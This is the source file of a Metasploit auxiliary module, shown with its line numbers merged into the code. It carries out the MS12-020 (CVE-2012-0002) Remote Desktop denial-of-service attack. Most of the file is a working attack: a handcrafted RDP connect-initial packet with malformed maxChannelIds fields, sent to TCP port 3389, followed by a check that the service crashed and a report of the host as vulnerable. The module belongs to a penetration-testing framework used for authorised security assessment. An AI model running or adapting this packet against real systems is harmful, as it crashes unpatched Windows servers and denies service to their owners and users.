Path: blob/master/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Auxiliary::Report7include Msf::Exploit::Remote::Tcp8include Msf::Auxiliary::Dos910def initialize(info = {})11super(12update_info(13info,14'Name' => 'MS12-020 Microsoft Remote Desktop Use-After-Free DoS',15'Description' => %q{16This module exploits the MS12-020 RDP vulnerability originally discovered and17reported by Luigi Auriemma. The flaw can be found in the way the T.12518ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result19an invalid pointer being used, therefore causing a denial-of-service condition.20},21'References' => [22[ 'CVE', '2012-0002' ],23[ 'MSB', 'MS12-020' ],24[ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],25[ 'URL', 'http://web.archive.org/web/20161020044803/http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],26[ 'URL', 'http://web.archive.org/web/20160627131634/http://pastie.org/private/feg8du0e9kfagng4rrg' ],27[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],28[ 'EDB', '18606' ],29[ 'URL', 'https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/' ]30],31'Author' => [32'Luigi Auriemma',33'Daniel Godas-Lopez', # Entirely based on Daniel's pastie34'Alex Ionescu',35'jduck',36'#ms12-020' # Freenode IRC37],38'License' => MSF_LICENSE,39'DisclosureDate' => '2012-03-16',40'Notes' => {41'Stability' => [CRASH_SERVICE_DOWN],42'SideEffects' => [],43'Reliability' => []44}45)46)4748register_options(49[50Opt::RPORT(3389)51]52)53end5455def is_rdp_up56connect57disconnect58return true59rescue Rex::ConnectionRefused60return false61rescue Rex::ConnectionTimeout62return false63end6465def run66max_channel_ids = "\x02\x01\xff"6768pkt = '' \69"\x03\x00\x00\x13" + # TPKT: version + length70"\x0E\xE0\x00\x00" + # X.224 (connection request)71"\x00\x00\x00\x01" \72"\x00\x08\x00\x00" \73"\x00\x00\x00" \74"\x03\x00\x00\x6A" + # TPKT: version + length75"\x02\xF0\x80" + # X.224 (connect-initial)76"\x7F\x65\x82\x00" + # T.12577"\x5E" \78"\x04\x01\x01" + # callingDomainSelector79"\x04\x01\x01" + # calledDomainSelector80"\x01\x01\xFF" + # upwardFlag81"\x30\x19" + # targetParameters82max_channel_ids + # maxChannelIds83"\x02\x01\xFF" + # maxUserIds84"\x02\x01\x00" + # maxTokenIds85"\x02\x01\x01" + # numPriorities86"\x02\x01\x00" + # minThroughput87"\x02\x01\x01" + # maxHeight88"\x02\x02\x00\x7C" + # maxMCSPDUsize89"\x02\x01\x02" + # protocolVersion90"\x30\x19" + # minimumParameters91max_channel_ids + # maxChannelIds92"\x02\x01\xFF" + # maxUserIds93"\x02\x01\x00" + # maxTokenIds94"\x02\x01\x01" + # numPriorities95"\x02\x01\x00" + # minThroughput96"\x02\x01\x01" + # maxHeight97"\x02\x02\x00\x7C" + # maxMCSPDUsize98"\x02\x01\x02" + # protocolVersion99"\x30\x19" + # maximumParameters100max_channel_ids + # maxChannelIds101"\x02\x01\xFF" + # maxUserIds102"\x02\x01\x00" + # maxTokenIds103"\x02\x01\x01" + # numPriorities104"\x02\x01\x00" + # minThroughput105"\x02\x01\x01" + # maxHeight106"\x02\x02\x00\x7C" + # maxMCSPDUsize107"\x02\x01\x02" + # protocolVersion108"\x04\x82\x00\x00" + # userData109"\x03\x00\x00\x08" + # TPKT: version + length110"\x02\xF0\x80" + # X.224111"\x28" + # T.125112"\x03\x00\x00\x08" + # TPKT: version + length113"\x02\xF0\x80" + # X.224114"\x28" + # T.125115"\x03\x00\x00\x08" + # TPKT: version + length116"\x02\xF0\x80" + # X.224117"\x28" + # T.125118"\x03\x00\x00\x08" + # TPKT: version + length119"\x02\xF0\x80" + # X.224120"\x28" + # T.125121"\x03\x00\x00\x08" + # TPKT: version + length122"\x02\xF0\x80" + # X.224123"\x28" + # T.125124"\x03\x00\x00\x08" + # TPKT: version + length125"\x02\xF0\x80" + # X.224126"\x28" + # T.125127"\x03\x00\x00\x08" + # TPKT: version + length128"\x02\xF0\x80" + # X.224129"\x28" + # T.125130"\x03\x00\x00\x08" + # TPKT: version + length131"\x02\xF0\x80" + # X.224132"\x28" + # T.125133"\x03\x00\x00\x0C" + # TPKT: version + length134"\x02\xF0\x80" + # X.224135"\x38\x00\x06\x03" + # T.125136"\xF0" \137"\x03\x00\x00\x09" + # TPKT: version + length138"\x02\xF0\x80" + # X.224139"\x21\x80" # T.125140141unless is_rdp_up142print_error("#{rhost}:#{rport} - RDP Service Unreachable")143return144end145146connect147print_status("#{rhost}:#{rport} - Sending #{name}")148sock.put(pkt)149Rex.sleep(3)150disconnect151print_status("#{rhost}:#{rport} - #{pkt.length} bytes sent")152153print_status("#{rhost}:#{rport} - Checking RDP status...")154155if is_rdp_up156print_error("#{rhost}:#{rport} - RDP Service Unreachable")157return158else159print_good("#{rhost}:#{rport} seems down")160report_vuln({161host: rhost,162port: rport,163name: name,164refs: references,165info: "Module #{fullname} successfully crashed the target system via RDP"166})167end168end169end170171172